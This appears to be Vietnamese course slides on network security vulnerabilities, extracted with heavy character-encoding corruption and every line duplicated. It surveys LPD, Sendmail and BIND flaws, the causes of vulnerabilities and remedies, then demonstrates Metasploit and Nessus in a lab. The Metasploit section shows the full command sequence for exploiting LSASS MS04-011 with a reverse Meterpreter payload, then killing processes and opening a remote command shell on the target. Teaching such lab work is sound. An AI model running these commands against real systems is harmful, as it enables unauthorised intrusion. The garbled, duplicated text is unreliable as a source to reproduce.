trªn m¹ng trong cc hÖ thèng Unix vµ Linux. Tuy nhiªn nhiÒu trªn m¹ng trong cc hÖ thèng Unix vµ Linux. Tuy nhiªn nhiÒu
LPD chøa cc sai sãt lËp tr×nh dÉn ®Õn lçi trµn bé ®Öm sau khi LPD chøa cc sai sãt lËp tr×nh dÉn ®Õn lçi trµn bé ®Öm sau khi
kÎ tÊn c«ng ch¹y cc m· c ý víi ®Æc quyÒn root.kÎ tÊn c«ng ch¹y cc m· c ý víi ®Æc quyÒn root.
Göi th (Sendmail)Göi th (Sendmail) Ð Sendmail lµ ch¬ng trSendmail lµ ch¬ng tr××nh göi, nhËn, göi chuyÓn tiÕp phÇn lín nh göi, nhËn, göi chuyÓn tiÕp phÇn lín
cc th ®iÖn tö ®îc xö lý trªn cc my tÝnh Unix vµ Linux. Víi c c th ®iÖn tö ®îc xö lý trªn cc my tÝnh Unix vµ Linux. Víi
viÖc Sendmail ®îc sö dông réng r·i trªn Internet nªn nã lµ môc viÖc Sendmail ®îc sö dông réng r·i trªn Internet nªn nã lµ môc
tiªu cho nhiÒu kÎ tÊn c«ng trong nhiÒu ntiªu cho nhiÒu kÎ tÊn c«ng trong nhiÒu n¨m qua.m qua.
Ð C c rñi ro gÆp phC c rñi ro gÆp ph¶¶i ®èi víi Sendmail thêng lµ hai d¹ng chÝnh: i ®èi víi Sendmail thêng lµ hai d¹ng chÝnh:
sù leo thang ®Æc quyÒn g©y ra do trµn bé ®Öm vµ viÖc cÊu sù leo thang ®Æc quyÒn g©y ra do trµn bé ®Öm vµ viÖc cÊu
hh××nh kh«ng thÝch hîp cho phÐp my tÝnh cña b¹n lµ mét ca nh kh«ng thÝch hîp cho phÐp my tÝnh cña b¹n lµ mét ca
(relay) cho cc th ®iÖn tö tõ cc my kh c(relay) cho cc th ®iÖn tö tõ cc my kh c
BIND/DNSBIND/DNS Ð C c gãi Berkeley Internet Name Domain (BIND) lµ sù thùc thi cña C c gãi Berkeley Internet Name Domain (BIND) lµ sù thùc thi cña
Domain Name Service (DNS) ®îc sö dông réng r·i nhÊt - hÖ thèng Domain Name Service (DNS) ®îc sö dông réng r·i nhÊt - hÖ thèng cho phÐp x c ®Þnh vÞ trÝ cña server trªn Internet (hoÆc m¹ng côc cho phÐp x c ®Þnh vÞ trÝ cña server trªn Internet (hoÆc m¹ng côc bé) b»ng cch sö dông tªn (vÝ dô www.yahoo.com) mµ kh«ng cÇn bé) b»ng cch sö dông tªn (vÝ dô www.yahoo.com) mµ kh«ng cÇn phph¶¶i biÕt râ ®Þa chØ IP cña chóng. Sù cã mÆt ë kh¾p mäi n¬i i biÕt râ ®Þa chØ IP cña chóng. Sù cã mÆt ë kh¾p mäi n¬i cña BIND ®· lµm cho nã thêng xuyªn lµ ®Ých cña cc cuéc tÊn cña BIND ®· lµm cho nã thêng xuyªn lµ ®Ých cña cc cuéc tÊn c«ng. Trong khi cc nhµ ph t triÓn BIND ®· cã lÞch sö söa cc c«ng. Trong khi cc nhµ ph t triÓn BIND ®· cã lÞch sö söa cc ®iÓm yÕu rÊt nhanh th®iÓm yÕu rÊt nhanh th×× mét sè lîng bÊt thêng ®· lçi thêi hoÆc mét sè lîng bÊt thêng ®· lçi thêi hoÆc cc server ®îc cÊu hcc server ®îc cÊu h××nh sai vÉn cßn vµ ®ang ph« bµy ra cho cc nh sai vÉn cßn vµ ®ang ph« bµy ra cho cc cuéc tÊn c«ng.cuéc tÊn c«ng.
Ð Cã mét sè nh©n tè ®ãng gãp vµo tCã mét sè nh©n tè ®ãng gãp vµo t××nh tr¹ng nµy. Nh©n tè chñ yÕu nh tr¹ng nµy. Nh©n tè chñ yÕu thuéc vÒ nhthuéc vÒ nh÷÷ng ngêi qung ngêi qu¶¶n trÞ-nhn trÞ-nh÷÷ng ngêi ®· kh«ng biÕt cc ng ngêi ®· kh«ng biÕt cc n©ng cÊp an toµn, cc hÖ thèng ch¹y BIND deamon (®îc gäi lµ n©ng cÊp an toµn, cc hÖ thèng ch¹y BIND deamon (®îc gäi lµ ÒnamedÓ) kh«ng cÇn thiÕt vµ cc file cÊu hÒnamedÓ) kh«ng cÇn thiÕt vµ cc file cÊu h××nh sai. Nhnh sai. Nh÷÷ng ®iÒu ng ®iÒu nµy cã thÓ mang ®Õn viÖc tõ chèi dÞch vô, trµn bé ®Öm hoÆc nµy cã thÓ mang ®Õn viÖc tõ chèi dÞch vô, trµn bé ®Öm hoÆc huû ho¹i DNS cache. huû ho¹i DNS cache. §§iÓm yÕu cña BIND ®îc ph t hiÖn ra gÇn iÓm yÕu cña BIND ®îc ph t hiÖn ra gÇn ®©y nhÊt lµ tõ chèi dÞch vô. Trong trêng hîp nµy kÎ tÊn c«ng cã ®©y nhÊt lµ tõ chèi dÞch vô. Trong trêng hîp nµy kÎ tÊn c«ng cã thÓ göi cc gãi DNS riªng b¾t buéc kiÓm tra tÝnh vthÓ göi cc gãi DNS riªng b¾t buéc kiÓm tra tÝnh v÷÷ng ch¾c bªn ng ch¾c bªn trong, chç dÔ bÞ tÊn c«ng vµ sÏ lµm t¾t BIND deamon. Mét kiÓu trong, chç dÔ bÞ tÊn c«ng vµ sÏ lµm t¾t BIND deamon. Mét kiÓu kh c lµ tÊn c«ng trµn bé ®Öm trong ®ã kÎ tÊn c«ng tËn dông sù kh c lµ tÊn c«ng trµn bé ®Öm trong ®ã kÎ tÊn c«ng tËn dông sù thùc thi yÕu cña cc th viÖn thiÕt bÞ githùc thi yÕu cña cc th viÖn thiÕt bÞ gi¶¶i DNS. B»ng cch göi cc i DNS. B»ng cch göi cc ®¸p øng DNS ¸c ý kÎ tÊn c«ng cã thÓ th®¸p øng DNS ¸c ý kÎ tÊn c«ng cã thÓ th¨m dß ®iÓm yÕu nµy vµ m dß ®iÓm yÕu nµy vµ thùc thi c c m· tuú ý hoÆc thËm chÝ g©y ra tõ chèi dich vôthùc thi c c m· tuú ý hoÆc thËm chÝ g©y ra tõ chèi dich vô
Sù x c thùc Unix nãi chung- C c tµi khoSù x c thùc Unix nãi chung- C c tµi kho¶¶n kh«ng mËt n kh«ng mËt khÈu hoÆc mËt khÈu yÕu (General Windows khÈu hoÆc mËt khÈu yÕu (General Windows Authentication -- Accounts with No Passwords or Weak Authentication -- Accounts with No Passwords or Weak
Passwords)Passwords)
Ч§èi víi hÖ ®iÒu hµnh Unix còng cã ®iÓm yÕu trong èi víi hÖ ®iÒu hµnh Unix còng cã ®iÓm yÕu trong
viÖc x c thùc nãi chung vµ cc tµi khoviÖc x c thùc nãi chung vµ cc tµi kho¶¶n kh«ng mËt n kh«ng mËt
khÈu hoÆc mËt khÈu yÕu gièng nh ®èi víi hÖ ®iÒu khÈu hoÆc mËt khÈu yÕu gièng nh ®èi víi hÖ ®iÒu
hµnh Microsoft Windows ®· trhµnh Microsoft Windows ®· tr××nh bµy ë trªnnh bµy ë trªn
III. Nguyªn nh©n xuÊt hiÖn lç hæng III. Nguyªn nh©n xuÊt hiÖn lç hæng b¶o mËtb¶o mËt
1. C c lç hæng tõ hÖ ®iÒu hµnh vµ cc øng dông1. C c lç hæng tõ hÖ ®iÒu hµnh vµ cc øng dông
C c vÊn ®Ò vÒ t©m lýC c vÊn ®Ò vÒ t©m lý
Ð Khi viÕt mét ch¬ng tr×nh phÇn mÒm, ngêi x©y dùng ch¬ng Khi viÕt mét ch¬ng tr×nh phÇn mÒm, ngêi x©y dùng ch¬ng
tr×nh ph¶i ®Æt ra tÊt c¶ cc kh¶ n ng (thùc hiÖn ®îc vµ kh«ng tr×nh ph¶i ®Æt ra tÊt c¶ cc kh¶ n ng (thùc hiÖn ®îc vµ kh«ng
thùc hiÖn ®îc) ®Ó cã ph¬ng híng kh¾c phôc lçi vµ th«ng bo thùc hiÖn ®îc) ®Ó cã ph¬ng híng kh¾c phôc lçi vµ th«ng bo
lçilçi
C c lç hæng sinh ra do thay ®æi vai trß (change of role C c lç hæng sinh ra do thay ®æi vai trß (change of role
hole).hole).
Ð RÊt nhiÒu xuÊt ph t tõ viÖc ch¹y cc ch¬ng tr×nh trong cc m«i RÊt nhiÒu xuÊt ph t tõ viÖc ch¹y cc ch¬ng tr×nh trong cc m«i
trêng kh c nhau.trêng kh c nhau.
C c lç hæng trµn bé ®Öm: Trµn bé ®Öm xuÊt hiÖn C c lç hæng trµn bé ®Öm: Trµn bé ®Öm xuÊt hiÖn
trong mét sè trêng hîp:trong mét sè trêng hîp:
Ð Khi ®äc d÷ liÖu trùc tiÕp vµo vïng ®ÖmKhi ®äc d÷ liÖu trùc tiÕp vµo vïng ®Öm
Ð Khi copy d÷ liÖu tõ vïng ®Öm lín sang vïng ®Öm nhá h¬nKhi copy d÷ liÖu tõ vïng ®Öm lín sang vïng ®Öm nhá h¬n
Ð Khi thùc hiÖn xö lý d÷ liÖu kh c trªn vïng ®Öm cña x©u.Khi thùc hiÖn xö lý d÷ liÖu kh c trªn vïng ®Öm cña x©u.
Sù uû quyÒn nhÇm lÉnSù uû quyÒn nhÇm lÉn
Ð NhiÒu khi sù thay ®æi tªn file sÏ lµm thay ®æi kiÓu cña file dÉn NhiÒu khi sù thay ®æi tªn file sÏ lµm thay ®æi kiÓu cña file dÉn
®Õn viÖc thay ®æi cc ®Æc quyÒn trªn cc file ®ã.®Õn viÖc thay ®æi cc ®Æc quyÒn trªn cc file ®ã.
Lçi më hoÆc ®ãng (fail Ðopen or - closed):Lçi më hoÆc ®ãng (fail Ðopen or - closed): PhÇn lín cc PhÇn lín cc
hÖ thèng nh¹y chÖ thèng nh¹y c¶¶m vÒ an toµn kh«ng thùc hiÖn ®óng m vÒ an toµn kh«ng thùc hiÖn ®óng
trong mét sè trêng hîp. Chóng thêng gÆp lçi trong 2 trtrong mét sè trêng hîp. Chóng thêng gÆp lçi trong 2 tr
êng hîp sau:êng hîp sau:
Ð Cho phÐp truy cËp trong khi kh«ng cÇn cho phÐp truy nhËp. Cho phÐp truy cËp trong khi kh«ng cÇn cho phÐp truy nhËp.
§§iÒu nµy ®îc gäi lµ lçi më (fail-open)iÒu nµy ®îc gäi lµ lçi më (fail-open)
Ð Tõ chèi truy cËp trong khi kh«ng cÇn tõ chèi truy nhËp. Tõ chèi truy cËp trong khi kh«ng cÇn tõ chèi truy nhËp. §§iÒu iÒu
nµy ®îc gäi lµ lçi ®ãng (fail-closed)nµy ®îc gäi lµ lçi ®ãng (fail-closed)
ThiÕu tµi nguyªn (Resource starvation)ThiÕu tµi nguyªn (Resource starvation)
Tin tëng nhTin tëng nh÷÷ng nguån kh«ng ®¸ng tin cËy (Trusting ng nguån kh«ng ®¸ng tin cËy (Trusting
untrustworthy channels)untrustworthy channels)
Ranh giíi an toµn lín (Big interfaces)Ranh giíi an toµn lín (Big interfaces)
Ýt møc an toµnÝt møc an toµn
2. VÊn ®Ò ®èi víi ngêi sö dông2. VÊn ®Ò ®èi víi ngêi sö dông
Ngoµi nguyªn nh©n do hÖ ®iÒu hµnh vµ øng dông chøa Ngoµi nguyªn nh©n do hÖ ®iÒu hµnh vµ øng dông chøa
cc lçi g©y ra cc lç hæng bcc lçi g©y ra cc lç hæng b¶¶o mËt nh ®· ®Ò cËp ë trªn, o mËt nh ®· ®Ò cËp ë trªn,
cc lçi hæng bcc lçi hæng b¶¶o mËt cßn xuÊt hiÖn do cc nguyªn nh©n o mËt cßn xuÊt hiÖn do cc nguyªn nh©n
sausau::
M¹ng vµ my chñ bÞ cÊu hM¹ng vµ my chñ bÞ cÊu h××nh sainh sai
Nhµ cung cÊp thiÕu tr ch nhiÖmNhµ cung cÊp thiÕu tr ch nhiÖm
ThiÕu nhThiÕu nh÷÷ng c nh©n cã trng c nh©n cã tr××nh ®énh ®é
IV. Ph t hiÖn lç hæng b¶o mËtIV. Ph t hiÖn lç hæng b¶o mËt
§Ó ph t hiÖn vµ t×m ra cc lç hæng b¶o mËt, ng§Ó ph t hiÖn vµ t×m ra cc lç hæng b¶o mËt, ngêi ta sö dông cc ch¬ng tr×nh t×m kiÕm vµ ph t êi ta sö dông cc ch¬ng tr×nh t×m kiÕm vµ ph t hiÖn cc lç hæng b¶o mËt, vÝ dô:hiÖn cc lç hæng b¶o mËt, vÝ dô:ÐNessus (Linux)Nessus (Linux)ÐSnort (Linux)Snort (Linux)ÐHFNETCHK (Windows)HFNETCHK (Windows)ÐInforsec scanner (Windows)Inforsec scanner (Windows)ÐWindows UpdateWindows Update
V. C ch kh¾c phôc cc lç hængV. C ch kh¾c phôc cc lç hæng
N©ng cÊp hÖ ®iÒu hµnhN©ng cÊp hÖ ®iÒu hµnh
Sö dông phÇn mÒm diÖt virusSö dông phÇn mÒm diÖt virus
Ngõng chia sÎ fileNgõng chia sÎ file
V« hiÖu ho cc Script Hosting.V« hiÖu ho cc Script Hosting.
Sö dông Firewall, cc ch¬ng tr×nh ph t hiÖn vµ Sö dông Firewall, cc ch¬ng tr×nh ph t hiÖn vµ
chèng x©m nhËp tr i phÐpchèng x©m nhËp tr i phÐp
Sö dông miÕng v (patches)Sö dông miÕng v (patches)
PhÇn II: Thùc hµnh mét sè phÇn PhÇn II: Thùc hµnh mét sè phÇn mÒm quÐt lç hængmÒm quÐt lç hæng
Mét sè ch¬ng tr×nh quÐt lç hængMét sè ch¬ng tr×nh quÐt lç hængÐWindows UpdateWindows UpdateÐSecurity Holes ScannerSecurity Holes ScannerÐInfosec ScannerInfosec ScannerÐ nessusnessus
Thùc hµnh khai th c vµo lç hængThùc hµnh khai th c vµo lç hængÐMetasploitMetasploit
II. PhÇn mÒm MetasploitII. PhÇn mÒm Metasploit
Giíi thiÖuGiíi thiÖu Cµi ®ÆtCµi ®Æt Có ph pCó ph p Mét sè tuú chänMét sè tuú chän C c vÝ dôC c vÝ dô
11. Giíi thiÖu. Giíi thiÖu
Metasploit Framework lµ mét m«i trêng Metasploit Framework lµ mét m«i trêng dïng ®Ó kiÓm tra, tÊn c«ng vµ khai th c dïng ®Ó kiÓm tra, tÊn c«ng vµ khai th c lçi cña cc dÞch vô. Metasploit cã thÓ ch¹y lçi cña cc dÞch vô. Metasploit cã thÓ ch¹y trªn hÇu hÕt cc hÖ ®iÒu hµnh Linux, trªn hÇu hÕt cc hÖ ®iÒu hµnh Linux, windows. Ta cã thÓ download ch¬ng windows. Ta cã thÓ download ch¬ng tr×nh t¹i tr×nh t¹i www.metasploit.comwww.metasploit.com
2. Cµi ®Æt2. Cµi ®Æt
Truy nhËp vµo th môc chøa bé cµi cña Truy nhËp vµo th môc chøa bé cµi cña Metasploit, ch¹y file Framework-2.4.exeMetasploit, ch¹y file Framework-2.4.exe
Theo cc chØ dÉn trªn mµn h×nhTheo cc chØ dÉn trªn mµn h×nh
3. Sö dông metasploit3. Sö dông metasploit Metasploit cã thÓ ch¹y trªn 2 chÕ ®é: ChÕ ®é dßng Metasploit cã thÓ ch¹y trªn 2 chÕ ®é: ChÕ ®é dßng
lÖnh (Console) vµ chÕ ®é giao diÖn web (Web lÖnh (Console) vµ chÕ ®é giao diÖn web (Web interface)interface)
C ch thùc hiÖn:C ch thùc hiÖn: Start Start Programs Programs Metasploit Framework Metasploit Framework
MFSConsoleMFSConsole Thùc hiÖn cc lÖnh cña metasploit:Thùc hiÖn cc lÖnh cña metasploit:
a. Chän module exploita. Chän module exploit
Lùa chän ch¬ng tr×nh, dÞch vô lçi mµ Lùa chän ch¬ng tr×nh, dÞch vô lçi mµ metasploit cã thÓ hç trî ®Ó khai th cmetasploit cã thÓ hç trî ®Ó khai th c
s how explo its s how explo its : xem các module exploit mà : xem các module exploit mà framework có h tr ỗ ợframework có h tr ỗ ợ
_us e exploit name _us e exploit name : ch n module exploit ọ: ch n module exploit ọ
_info exploit name _info exploit name : xem thông tin v module ề: xem thông tin v module ềexploit exploit
Ta nên cập nhật thường xuyên các lỗi dịch vụ Ta nên cập nhật thường xuyên các lỗi dịch vụ trêntrên www.metasploit.comwww.metasploit.com
b. CÊu h×nh cho module exploit b. CÊu h×nh cho module exploit ®· chän®· chän
show options:show options: Xác định những options nào cần Xác định những options nào cần cấu hình cấu hình
set set :: cấu hình cho những option của module đó cấu hình cho những option của module đó
c. X¸c nhËn l¹i nh÷ng options c. X¸c nhËn l¹i nh÷ng options võa cÊu h×nhvõa cÊu h×nh
checkcheck:: kiểm tra xem những option đã được set kiểm tra xem những option đã được set chính xác chưa. chính xác chưa.
d. Lùa chän targetd. Lùa chän target Lùa chän hÖ ®iÒu hµnh nµo ®Ó thùc hiÖnLùa chän hÖ ®iÒu hµnh nµo ®Ó thùc hiÖn
show targetsshow targets:: những target được cung cấp bởi module đó những target được cung cấp bởi module đó
setset:: xác định target nào xác định target nào
vd: vd: mfs> use windows_ssl_pctmfs> use windows_ssl_pct
show targetsshow targets
exploit sẽ liệt kê ra những target như: winxp, winxp SP1, exploit sẽ liệt kê ra những target như: winxp, winxp SP1, win2000, win2000 SP1win2000, win2000 SP1
e. Lùa chän payload ®Ó thùc e. Lùa chän payload ®Ó thùc hiÖnhiÖn
payload là đoạn code mà sẽ chạy trên hệ thống remote payload là đoạn code mà sẽ chạy trên hệ thống remote
machine machine
show payloadsshow payloads:: liệt kê ra những payload của module exploit hiện tại liệt kê ra những payload của module exploit hiện tại
info payload_nameinfo payload_name:: xem thông tin chi tiết về payload đó xem thông tin chi tiết về payload đó
set PAYLOAD payload_nameset PAYLOAD payload_name:: xác định payload module name. xác định payload module name.
f. Thùc thi exploitf. Thùc thi exploit
exploitexploit:: lệnh dùng để thực thi payload code. Payload sau đó sẽ lệnh dùng để thực thi payload code. Payload sau đó sẽ
cung cấp cho bạn những thông tin về hệ thống được khai tháccung cấp cho bạn những thông tin về hệ thống được khai thác
VÝ dôVÝ dô Máy localhost có địa chỉ 192.168.1.1 sẽ tấn công máy remote Máy localhost có địa chỉ 192.168.1.1 sẽ tấn công máy remote
có địa chỉ 192.168.1.2 thông qua lỗi Lsass_ms04_011. Đây là có địa chỉ 192.168.1.2 thông qua lỗi Lsass_ms04_011. Đây là lỗi tràn stack trong dịch vụ LSA( Local Security lỗi tràn stack trong dịch vụ LSA( Local Security Authority).Lsass.exe là một process của hệ thống Microsoft Authority).Lsass.exe là một process của hệ thống Microsoft Windows, chịu trách nhiệm về chứng thực local security, quản Windows, chịu trách nhiệm về chứng thực local security, quản lý Active Directory và các chính sách login. Lsass kiểm sóat lý Active Directory và các chính sách login. Lsass kiểm sóat việc chứng thực của cả client và server.việc chứng thực của cả client và server.
Msf>use Lsass_ms04_011 Msf>use Lsass_ms04_011 Msf>set PAYLOAD win32_reverse_meterpreter Msf>set PAYLOAD win32_reverse_meterpreter Msf>set RHOST 192.168.1.2 Msf>set RHOST 192.168.1.2 Msf>set LHOST 192.168.1.1 Msf>set LHOST 192.168.1.1 Msf>exploit Msf>exploit Meterpreter> help Meterpreter> help Meterpreter>use -m ProcessMeterpreter>use -m Process //add thêm tập lệnh của process //add thêm tập lệnh của process Meterpreter>helpMeterpreter>help // xem các lệnh meterpreter hỗ trợ // xem các lệnh meterpreter hỗ trợ Meterpreter>psMeterpreter>ps // list các process mà remote // list các process mà remote machine đang chạy machine đang chạy Meterpreter>killMeterpreter>kill // tắt các process mà remote // tắt các process mà remote machine đang chạymachine đang chạy
>Meterpreter>Meterpreter execute -f cmd Ðc execute -f cmd Ðc// t n công s d ng comandline cmd ấ ử ụ// t n công s d ng comandline cmd ấ ử ục a remote machine ủc a remote machine ủ
execute: success, process id is 3516. execute: success, process id is 3516.
execute: allocated channel 1 for new process. execute: allocated channel 1 for new process.
>meterpreter>meterpreter interact 1 interact 1
interact: Switching to interactive console on 1... interact: Switching to interactive console on 1...
interact: Started interactive channel 1. interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600] Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp. (C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>echo Meterpreter interactive channel in action C:\WINDOWS>echo Meterpreter interactive channel in action echo Meterpreter interactive channel in action echo Meterpreter interactive channel in action
Meterpreter interactive channel in action Meterpreter interactive channel in action
:\ >C WINDOWS:\ >C WINDOWS ipconfig ipconfig
Caught Ctrl-C, close interactive session? [y/N] y Caught Ctrl-C, close interactive session? [y/N] y
>meterpreter>meterpreter
PhÇn mÒm quÐt lç hæng b¶o PhÇn mÒm quÐt lç hæng b¶o mËt:mËt:
1. Nes s us1. Nes s us
1.1. ×CÊu tróc ch¬ng tr nh1.1. ×CÊu tróc ch¬ng tr nh
Nessus gåm hai phÇn: Nessus gåm hai phÇn: nes s us nes s us client vµ client vµ nes s usnes s us server server ( )nes s s us d( )nes s s us d . PhÇn server . PhÇn server b¾t buéc ph¶i cµi ®Æt vµ thùc thi trªn mét b¾t buéc ph¶i cµi ®Æt vµ thùc thi trªn mét hÖ thèng Linux, cßn phÇn client cã thÓ hÖ thèng Linux, cßn phÇn client cã thÓ ch¹y trªn mét my Linux hoÆc Windows.ch¹y trªn mét my Linux hoÆc Windows.
1.2. Cµi ®Æt ch¬ng tr×nh1.2. Cµi ®Æt ch¬ng tr×nh §Ó cµi ®Æt Nessus trªn mét hÖ thèng my tùa §Ó cµi ®Æt Nessus trªn mét hÖ thèng my tùa
Unix chóng ta cÇn cã bèn file sau:Unix chóng ta cÇn cã bèn file sau: - - - . . . nes s us libraries x x tar gz- - - . . . nes s us libraries x x tar gz - - . . . libnas l x x tar gz- - . . . libnas l x x tar gz - - . . . . nes s us core x x tar gz- - . . . . nes s us core x x tar gz - . . . . nes s us plugins x x tar gz- . . . . nes s us plugins x x tar gz Tríc hÕt cÇn gi¶i nÐn cc file trªn ®Ó ®îc cc Tríc hÕt cÇn gi¶i nÐn cc file trªn ®Ó ®îc cc
th môc t¬ng øng, sau ®ã tiÕn hµnh cµi ®Æt th môc t¬ng øng, sau ®ã tiÕn hµnh cµi ®Æt theo thø tù sau:theo thø tù sau:
*Cµi ®Æt *Cµi ®Æt - nes s us libraries- nes s us libraries - ChuyÓn vµo th môc - ChuyÓn vµo th môc - nes s us libraries- nes s us libraries -cd nes s us libraries -cd nes s us libraries - - Ch¹yCh¹y configure configure ./configure./configure - - Thùc thi Thùc thi make make vµ vµ make ins tall make ins tall makemake make ins tall make ins tall
* Cµi ®Æt * Cµi ®Æt :libnas l:libnas l T¬ng tù nh cµi ®Æt T¬ng tù nh cµi ®Æt - nes s us libraries- nes s us libraries
cd libnas l cd libnas l ./configure./configure makemake make ins tall make ins tall * Sau ®ã cµi ®Æt * Sau ®ã cµi ®Æt - -nes s us core nes s us- -nes s us core nes s us
pluginsplugins theo tr×nh tù nh trªn theo tr×nh tù nh trªn
: Chó ý : Chó ý NÕu cµi ®Æt trªn hÖ thèng Linux th× trong file NÕu cµi ®Æt trªn hÖ thèng Linux th× trong file //
/ . .etc ld s o conf/ . .etc ld s o conf cÇn cã thªm cÇn cã thªm / / /us r local lib/ / /us r local lib, sau , sau ®ã t¹i dßng lÖnh gâ ®ã t¹i dßng lÖnh gâ .ldconfig.ldconfig
NÕu øng dông client kh«ng muèn sö dông ë NÕu øng dông client kh«ng muèn sö dông ë chÕ ®é GTK, ta cã thÓ sö dông ë chÕ ®é dßng chÕ ®é GTK, ta cã thÓ sö dông ë chÕ ®é dßng lÖnh b»ng cch thªm tuú chän --lÖnh b»ng cch thªm tuú chän -- -dis able gtk-dis able gtk khi khi x©y dùng x©y dùng -nes s us core-nes s us core nh sau: nh sau:
- ; ./ -- - ; cd nes s us core configure dis able gtk - ; ./ -- - ; cd nes s us core configure dis able gtk make && make ins tall make && make ins tall
1.3. × CÊu h nh vµ ch¹y thö1.3. × CÊu h nh vµ ch¹y thö Sau khi ®· tiÕn h×nh cµi ®Æt nh trªn, chóng Sau khi ®· tiÕn h×nh cµi ®Æt nh trªn, chóng
ta tiÕn hµnh cÊu h×nh ta tiÕn hµnh cÊu h×nh nes s us dnes s us d vµ vµ nes s usnes s us client nh sau:client nh sau:
* CÊu h×nh * CÊu h×nh ( ):nes s us s erver nes s us d ( ):nes s us s erver nes s us d - T¹o tµi kho¶n - T¹o tµi kho¶n nes s us dnes s us d: TiÖn Ých : TiÖn Ých -nes s us-nes s us
addus eraddus er cho phÐp t¹o mét tµi kho¶n míi. cho phÐp t¹o mét tµi kho¶n míi. # -nes s us addus er# -nes s us addus er Addition of a new nes s us d us er Addition of a new nes s us d us er ------------------------------------------------------------ : Login renaud : Login renaud ( / ) [ ] : Authentication pas s cert pas s pas s ( / ) [ ] : Authentication pas s cert pas s pas s : Pas s word s ecret : Pas s word s ecret
- CÊu h×nh nessus daemon: Trong file - CÊu h×nh nessus daemon: Trong file /usr/local/etc/nessus/nessusd.conf ta cã /usr/local/etc/nessus/nessusd.conf ta cã thÓ thiÕt lËp mét sè tuú chän cho thÓ thiÕt lËp mét sè tuú chän cho nessusd . Th«ng thêng ë ®ã chóng ta nessusd . Th«ng thêng ë ®ã chóng ta chØ râ cc tµi nguyªn mµ ta muèn chØ râ cc tµi nguyªn mµ ta muèn nessusd sö dông.nessusd sö dông.
Sau khi ®· cÊu h×nh nessusd, ta cã Sau khi ®· cÊu h×nh nessusd, ta cã thÓ khëi ®éng nessusd b»ng quyÒn root thÓ khëi ®éng nessusd b»ng quyÒn root nh sau:nh sau:
-nes s us d D -nes s us d D
* CÊu h×nh client* CÊu h×nh client PhÇn trªn chóng PhÇn trªn chóng
ta ®· cÊu h×nh ta ®· cÊu h×nh nes s us dnes s us d, b©y giê ta , b©y giê ta cã thÓ thùc hiÖn kÕt cã thÓ thùc hiÖn kÕt nèi ®Õn nã nh mét nèi ®Õn nã nh mét ngêi dïng b×nh thngêi dïng b×nh thêngêng
- Gâ lÖnh - Gâ lÖnh nes s usnes s us tõ tõ dÊu nh¾c dßng lÖnhdÊu nh¾c dßng lÖnh
Sau khi ®· thiÕt lËp xong cc tuú chän trªn chóng ta tiÕn hµnh quÐt * KÕt qua thùc hiÖn quÐt trªn my 192.168.1.12 ®îc cho trong bang sau:
1
Hosts which where alive and responding during test
Scan Details
This report gives details on hosts that were tested and issues that were found. Please follow the recommended steps and procedures to eradicate these threats.
Nessus Scan Report
2. PhÇn mÒm Security Holes ScannerSecurity Holes Scanner